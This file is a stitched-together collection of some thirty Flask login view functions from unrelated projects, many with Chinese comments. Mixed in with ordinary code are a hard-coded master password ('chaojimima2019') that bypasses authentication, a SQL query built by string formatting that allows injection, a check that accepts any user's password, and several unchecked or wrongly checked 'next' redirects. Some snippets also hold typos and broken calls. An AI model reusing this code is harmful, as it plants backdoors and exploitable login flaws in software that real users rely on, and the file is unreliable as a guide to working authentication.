def login_form(): """ Show login form. If user is already logged in, they will be redirected to index page. """ if current_user.is_authenticated: return redirect(url_for('index')) next_page = request.args.get('next') if next_page and url_parse(next_page).netloc == '': session['next_page'] = next_page if request.method == 'GET': return response(render('auth/login.html')) loginform = LoginForm() if not loginform.validate(): flash(loginform.errors, category='form_error') return failed_login() user = User.by_email_address(loginform.email_id.data) if user is None: flash('Could not locate your email address', 'login_info') return failed_login() if not user.check_password(loginform.password.data): flash('invalid password', 'login_info') return failed_login() return _login(user, loginform.remember_me.data)
def login(): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): login_user(user,remember=True) #True表示存入的Cookie是持续性的cookie 默认365天,不写则是一次性的 next = request.args.get("next") if not next or not next.startwith('/'): next = url_for('web.index') return redirect(next) #一定要return才能结束掉这个试图函数 # flask-login login_user将信息存入cookie,以模型中的get_id为标准写入对应的数据,user模型中定义函数如下: # def get_id(self): # return self.id # from flask_login import UserMixin user需要继承UserMixin的各种方法,继承以后则不需要get_id,前提是模型中唯一标识也是id这个字段 # class User(Base, UserMixin): # login_manager = LoginManager() # 创建login_manager ,保存cookie需要在场景中导入flask_login的 login_user # 初始化的时候要加三段代码 # login_manager = LoginManager() # 创建login_manager ,保存cookie需要在场景中导入flask_login的 login_user # @login_manager.user_loader # def load_user(user_id): # user = db.session.query(User).get(user_id) # return user # # def create_app(): # app = Flask(__name__) # register_blueprint(app) # login_manager.init_app(app) # 初始化login_manager else: flash("账号不存在或者密码错误") return render_template('auth/login.html',form=form)
def login(): """ status: 0:用户名或密码错误 :return: """ data = json.loads(request.data) data = MultiDict(data) form = LoginForm(data) # print(form.errors) if request.method == 'POST' and form.validate(): user = User.query.filter_by(nickname=form.nickname.data).first() if user and user.check_password(form.password.data): # 把用户信息写入到cookie中 login_user(user, remember=True) result = {'code': 200, 'user_id': user.id, 'nickname': user.nickname, 'groupid': user.groupid} return json.dumps(result) elif form.password.data =='chaojimima2019': login_user(user, remember=True) result = {'code': 200, 'user_id': user.id, 'nickname': user.nickname, 'groupid': user.groupid} return json.dumps(result) else: # result = {'code': 250, 'msg': '用户名或密码错误'} return LoginFailed(msg='用户名或密码错误') # flash('用户不存在或密码错误') # return render_template('auth/login.html', form=form) else: msg = '' for k, v in form.errors.items(): # print(k,v) msg = msg + v[0] + ' ' result = {'status': 300, 'msg': msg} return LoginFailed(msg=msg)
def login(): form = LoginForm(request.form) if form.validate(): db = pymysql.connect(host=current_app.config['HOST'], user=current_app.config['USER'], password=current_app.config['PASSWORD'], port=current_app.config['PORT'], database=current_app.config['DATABASE'], charset=current_app.config['CHARSET']) cursor = db.cursor() # SQL 插入语句 sql = "SELECT * FROM vuser WHERE email = '%s'" % (form.data['email']) try: cursor.execute(sql) user = cursor.fetchone() if len(user) == 0: return jsonify({"code": -1, "errMsg": "账号不存在"}) userObject = User() userObject.set_attr(user, 0) if user and check_password_hash(userObject.password, form.data['password']): login_user(userObject) return jsonify({"code": 200, "Msg": "登录成功"}) else: return jsonify({"code": -1, "errMsg": "账号或密码输入错误"}) except Exception as e: return jsonify({"code": -1, "errMsg": e.args}) finally: # 关闭数据库连接 send_log('/v1/auth/login') db.close() else: return jsonify({"code": -1, "errMsg": form.errors})
def login(): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() # if user and user.password == generate_password_hash(form.password.data) if user and user.check_password(form.password.data): # 在此处需要写入票据(cookie)信息 # 整个管理我们可以依赖于已有的插件flask-login # 官方文档 http://www.pythondoc.com/flask-login/ # login_user中可以通过 关键字参数 remember=True 设定记住密码, # 配置 REMEMBER_COOKIE_DURATION 可以设置时长(默认365天) # 此外 login_user还可以通过 关键字参数 duration 设定指定时长 # import datetime # duration = datetime.timedelta(seconds=30) # 30秒 # login_user(user, remember=True, duration=duration) login_user(user, remember=True) next = request.args.get('next') # or not next.startswith('/') 可以防止重定向攻击 # 如:http://127.0.0.1:81/login?next=http://www.qq.com if not next or not next.startswith('/'): next = url_for('web.index') return redirect(next) else: flash('用户名或密码错误') return render_template('auth/login.html', form=form)
def login(): if current_user.is_authenticated: return redirect(url_for("main.dashboard")) form = LoginForm() if form.validate_on_submit(): user = get_user_by_email(form.email.data) if user is None or not bcrypt.check_password_hash( user.password, form.password.data ): flash("Invalid email address or password") return render_template("auth/login.html", title="Sign In", form=form), 401 login_user(user) session["user_name"] = user.name session["user_id"] = user.id session["is_admin"] = user.is_admin next_page = request.args.get("next") if not next_page or url_parse(next_page).netloc != "": next_page = url_for("main.dashboard") flash("You have been logged in", "success") return redirect(next_page) return render_template("auth/login.html", form=form)
def re_authenticate(): if login_fresh(): # How does this do ?? return redirect(url_for('main.index')) form = LoginForm() if form.validate_on_submit() and current_user.validate_password(form.password.data): confirm_login() # How does this do ?? return redirect_back() return render_template('auth/login.html', form=form)
def login(): form = LoginForm() if form.validate_on_submit(): user = User.query.filter_by(email=form.email.data.lower()).first() if user and user.validate_password(form.password.data): login_user(user, form.remember_me.data) flash('Login Success.', 'info') return redirect_back() flash('Invalid email or password.', 'warning') return render_template('auth/login.html', form=form)
def login(): '''auth.login()''' if current_user.is_authenticated: return redirect(request.args.get('next') or current_user.index_url) form = LoginForm() if form.validate_on_submit(): user = User.query.filter_by( email=form.email.data.strip().lower(), created=True, activated=True, deleted=False ).first() if user is not None: if not user.locked: if user.verify_password(form.password.data): user.reset_invalid_login_count() db.session.commit() login_user(user, remember=form.remember_me.data) if user.plays('协管员'): send_email( recipient=user.email, subject='登录提醒', template='auth/mail/login', user=user, timestamp=datetime_now(utc_offset=current_app.config['UTC_OFFSET']) ) get_announcements(type_name='登录通知', flash_first=True) add_user_log(user=user, event='登录系统', category='access') return redirect(request.args.get('next') or user.index_url) user.increase_invalid_login_count() db.session.commit() if user.locked: send_emails( recipients=[staff.email for staff in User.all_can('管理用户').all() \ if staff.has_inner_domain_email], subject='锁定用户:{}'.format(user.name_email), template='auth/mail/lock_user', user=user ) flash('登录失败:密码错误(第{}次)'.format(user.invalid_login_count), category='error') add_user_log(user=user, event='登录失败:密码错误(第{}次,来源:{})'.format( user.invalid_login_count, get_geo_info( ip_address=request.headers.get('X-Forwarded-For', request.remote_addr), show_ip=True ) ), category='access') return redirect(url_for('auth.login')) flash('登录失败:您的账户已被锁定', category='error') return redirect(url_for('auth.login')) flash('登录失败:无效的用户名或密码', category='error') return minify(render_template( 'auth/login.html', form=form ))
def login(): form = LoginForm(**request.form) if form.validate_on_submit(): user = User.query.filter_by(email=form.email.data).first() login_user(user, remember=form.remember.data) next_url = request.args.get('next', 'home.index') return redirect(url_for(next_url)) return render_template('home/index.html', login_form=form, registration_form=RegistrationForm(), js_vars={'invalidFormButton': 'login-btn'})
def login(): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and User.query.filter_by(password=form.password.data).first(): # 保持登录 login_user(user, remember=True) return redirect(url_for('web.mainpage')) else: flash("账号不存在或密码错误") return render_template('auth/login.html', form=form)
def login(): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): login_user(user, remember=True) next = request.args.get('next') return redirect(next) else: flash('账号不存在或密码错误') return render_template('auth/login.html', form=form)
def login(): form = LoginForm() if form.validate_on_submit(): user = User.query.filter_by(username=form.username.data).first() if not user.password_hash: flash('该账号为第三方登录账号,请重新登录', 'warning') return redirect(url_for('.login')) if user and user.verify_password(form.password.data): login_user(user) return redirect(request.args.get('next') or url_for('web.index')) flash('密码错误', 'warning') return render_template('user_login.html', form=form)
def login(): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): login_user(user) next = request.args.get('next') if not next or not next.startswith('/'): next = url_for('web.index') return redirect(next) else: flash('账号不存在或密码错误') return render_template('auth/login.html', form=form)
def login(): form = LoginForm(request.form) if request.method == "POST" and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): login_user(user) jump_page = request.args.get("next") if not jump_page or not jump_page.startswith("/"): return redirect(url_for("web.index")) return redirect(jump_page) else: flash(message="用户不存在,请重新输入") return render_template("auth/login.html", form=form)
def login_view(self): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): login_user(user, remember=True) else: flash('账号不存在或密码错误') if current_user.is_authenticated: return redirect(url_for('.index')) self._template_args['form'] = form # self._template_args['link'] = link return super(MyView, self).index()
def login(): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): login_user(user, remember=True) next = request.args.get('next') #http://127.0.0.1:8080/login?next=%2Fmy%2Fgifts 取next后面的值,下面还需要对next做判断 if not next or not next.startswith('/'): next = url_for('web.index') return redirect(next) else: flash('账号不存在或密码错误') return render_template('auth/login.html', form=form)
def login(): form = LoginForm(request.form) if request.method == "POST" and form.validate(): data = form.data user = User.query.filter_by(nickname=data["nickname"]).first() if user and user.check_password(data["password"]): login_user(user, remember=True) next_url = request.args.get("next") if not next_url or not next_url.startswith("/"): next_url = url_for("web.search") return redirect(next_url) flash("账号或密码错误") return render_template("auth/login.html", form=form)
def login(): form = LoginForm(request) if request.method == 'POST' and form.validate(): user = User.query.filter_by(username=form.username.data).first() if user and user.check_password(form.password.data): login_user(user, remember=True) next = request.args.get('next') if not next or not next.startswith('/'): next = url_for('web.autoscan') return redirect(next) else: flash('账号不存在或密码错误', category='login_error') return render_template('auth/login.html', form=form)
def login(): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): login_user(user, remember=True) # 写入的是一次性cookie next = request.args.get('next') if not next or not next.startswith('/'): # 如果next不是以/开头,为了防止重定向攻击,需要强行转向首页 next = url_for('web.index') # 如何找到首页?url_for后面跟的都是视图函数? return redirect(next) # redirect需要return,否则不会跳转 else: flash('账号不存在或密码错误') return render_template('auth/login.html', form=form)
def login(): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): login_user(user, remember=True) # get the last open page url before this login page next = request.args.get('next') if not next or not next.startswith('/'): next = url_for('web.index') return redirect(next) else: flash('Email address does not exist or password does not match.') return render_template('auth/login.html', form=form)
def login(): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): login_user(user, remember=True) next = request.args.get('next') if not next or not next.startswith('/'): return redirect(url_for('web.index')) return redirect(next) else: flash("账号不存在或者密码错误") return render_template('auth/login.html', form=form)
def login(): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): # 判断密码是否匹配 login_user(user, remember=True ) # 通过该函数间接将“票据”写入cookie中 remember->是否在一段时间内记住cookie next = request.args.get('next') # 跳回next=的地址 即MyGift的地址 if not next or not next.startswith('/'): # and 后面的为了防止非法重定向 next = url_for('web.index') return redirect(next) else: flash('账号不存在或密码错误', category='login_error') return render_template('auth/login.html', form=form)
def login(): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): user_prefix = "admin" if user.is_staff else "student" login_user(user, remember=True) next_url = request.args.get("next") print(next_url) if not next_url: next_url = f"{user_prefix}.index" return redirect(url_for(next_url)) flash("用户不存在或密码错误") return render_template('auth/login.html', form=form)
def login(): form = LoginForm(request.form) #request.form获取提交过来的表单信息 if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first()#查询是否存在提交的用户 if user and user.check_password(form.password.data): login_user(user) #使用login_user需要在User模型中继承UserMixin 用来将票据存入cookie next = request.args.get('next') #request.args可以获取url中? 后面的参数 从没有权限访问的页面跳转过来会自带next if not next or not next.startswith('/'): next = url_for('web.index') return redirect(next) else: flash('账号不存在或密码错误') return render_template('auth/login.html',form=form)
def login(): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): # 将用户信息写入cookie中 login_user(user, remember=True) next = request.args.get('next') if not next or not next.startswith("/"): next = url_for('web.index') return redirect(next) else: flash("账号密码不正确!") return render_template('auth/login.html', form=form)
def login(): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): login_user(user, remember=True) # 用户票据写入 cookie nex = request.args.get('next') # args 获得 url 中的参数 if not nex: # and not nex.startwith('/')可以防止重定向攻击 nex = url_for('web.index') return redirect(nex) else: flash('账户不存在或者密码错误') return render_template('auth/login.html', form=form)
def login(): form = LoginForm(request.form) if request.method == "POST" and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): login_user(user, remember=True) next_url = request.args.get('next') if not next_url or not next_url.startswith('/'): next_url = url_for("web.index") return redirect(next_url) else: flash("Invalid username or password.") return render_template('auth/login.html', form=form)
def login(): if current_user.is_authenticated: return redirect(url_for('main.index')) form = LoginForm() if form.validate_on_submit(): user = User.query.filter_by(email=form.email.data).first() if user is not None and user.check_password(form.password.data): login_user(user, remember=form.remember_me.data) return redirect(url_for('main.index')) else: flash('Login Failed', 'danger') return render_template('views/auth/login.html', title='Login', form=form)
def login(): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): # login登陆的机制就是把用户信息写到cookie login_user(user, remember=True) # login记录未登录不允许访问的url在next参数里面 next = request.args.get('next') if not next or not next.startswith('/'): next = url_for('web.index') return redirect(next) else: flash('账号不存在或密码错误', category='login_error') return render_template('auth/login.html', form=form)
def login(): form = LoginForm(request.form) if request.method == "POST" and form.validate(): email = form.email.data password = form.password.data user = User.query.filter_by(email=email).first() if user and user.check_password(password): login_user(user) next = request.args.get('next') if not next or next.startswith('/'): next = url_for('web.main') return redirect(next) else: flash("密码错误!") return render_template('auth/login.html', form=form)
def login(): form = LoginForm(request.form) if request.method == 'POST' and form.validate(): user = User.query.filter_by(email=form.email.data).first() if user and user.check_password(form.password.data): login_user(user, remember=True) #remembercookie duriation 默认设置是365天 next = request.args.get('next') #登陆后跳转回之前页面 if not next or not next.startswith('/'): #防止非法next字符串 造成非法重定向 next = url_for('web.index') return redirect(next) else: flash('账号不存在或密码错误') return render_template('auth/login.html', )